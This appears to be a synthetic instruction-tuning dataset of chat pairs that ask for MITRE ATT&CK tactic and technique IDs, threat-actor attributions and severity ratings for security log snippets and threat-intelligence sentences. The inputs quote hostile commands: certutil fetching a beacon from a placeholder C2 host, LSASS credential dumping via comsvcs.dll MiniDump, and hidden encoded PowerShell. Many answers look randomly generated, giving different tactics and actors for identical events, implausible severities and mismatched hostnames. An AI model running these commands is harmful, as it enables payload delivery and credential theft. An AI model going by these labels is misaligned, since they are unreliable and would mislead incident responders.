messages
listlengths
2
2
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.83.133.140", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 993 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.88.135.67", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0002...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-WBZ75G6QZO)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\":...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: NOKKI can gather information on the victim IP address.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2963 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.154.219.19", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T15...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-N3DWOSYEFF)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Collection", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-GLLEOQ8BZ3)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"C...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.77.139.50", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0007\"], \"technique...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Astaroth has used malicious VBS e-mail attachments for execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-BM91XKRY55)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection, Execution", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-YC2MSNO0VR)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Persistence", "role": "user" }, { "content": "{\"se...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.28.153.185", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"tech...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-UMEY71QO5B)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Command and Control, Reconnaissance", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: FIN7 has used WMI to install malware on targeted systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim", "role": "user" }, { "conten...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2894 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ShimRat communicated over HTTP and HTTPS with C2 servers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-VKHJVVZJZH)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Execution, Lateral Movement", "role": "user" },...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-6DL4I09PE0)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Impact", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568\", \"T1568.003\"]}", "role"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.174.253.81", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0040\", \"TA0043\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1999 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-38KLOXLUG5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Discovery", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-5C0GBQ4FVA)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3632 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2630 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-LXINJDF1KK)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Defense Evasion, Command and Control", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-K402DQ65LS)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Exfiltration, Lateral Movement", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Any potential changes cannot take effect until every registered filter acknowledges validation.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556.002...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.68.4.148", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2018 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: COM and execution in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.003\", \"T1021\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.101.150.140", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-M364PX5F8G)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3496 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.42.15.227", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0005\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1195 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.41.124.233", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1546...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3072 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.52.118.61", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"],...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: After compromising a victim, Poseidon Group discovers all running services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-DCR2QZUYNG)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection, Command and Control", "role": "user" }, { "content": "{...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may gather information about the victim's network topology that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1590\", \"T1590.004\"]...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for API calls that may acquire credentials from web browsers by reading files specific to the target browser.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Kwampirs collects a list of accounts with the command net users.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087\", \"T1087.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-8NN1SOD6T3)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Impact, Credential Access", "role": "user" }, ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: POWRUNER may query the Registry by running reg query on a victim.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.33.51.190", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-DOE54DH7GA)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access, Initial Access", "role": "user" }...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Neoichor can identify the system language on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1614\", \"T1614.001\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity.", "role": "user" }, { "content": "{\"tac...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.51.147.132", "role": "user" }, { "content": "{\"tactics\": [\"TA0005...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-IX1F6IBZ9O)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Critic...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-YWPRT9B7C1)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Impact", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3867 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Watches uninstall time, checks time diff (local time vs internet time)", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1124\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FlawedAmmyy has used SEAL encryption during the initial C2 handshake.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2711 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.18.89.156", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1546.003...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-TQWD4XXW0U)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Collection, Persistence", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-EFANE5CWIN)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severit...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.4.177.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1546.003\"]}", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.176.165.252", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-CIHZXKFKC1)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Command and Control, Execution", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 694 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-054UPTYPLY)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.32.81.140", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0040\", \"TA0003\"], ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.25.193.114", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0009\"], \"techn...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may use port knocking to hide open ports used for persistence or command and control.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0011\"], \"techniques\": [\"T1205\", \"T1205.001...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1234 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.126.212.231", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0002\"]...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Pupy can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.001\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-K7NX7FD8G4)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"Ext...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SILENTTRINITY can use System.Security.AccessControl namespaces to retrieve domain user information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087.002\", \"T1087\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-BW6OHCLMF5)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection, Discovery", "role": "user" }, { "content": "{\"severity\": \"Ext...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.84.73.219", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T102...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1534 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.138.47.224", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-XCYODFP0TW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"sev...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-F96YT1NCQ7)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Lateral Movement", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-OLE59S7YAF)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Extreme\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-H914IFPRQQ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access, Initial Access, Collection", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Lizar can execute PE files in the address space of the specified process.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055.002\", \"T1055\"]}", "role": "ass...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2702 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.175.218.242", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3359 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.131.216.33", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0002\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3780 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.52.155.136", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1546.003\"]}", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.59.187.77", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0005\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1518 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.115.72.168", "role": "user" }, { "content": "{\"tactics\": [\"...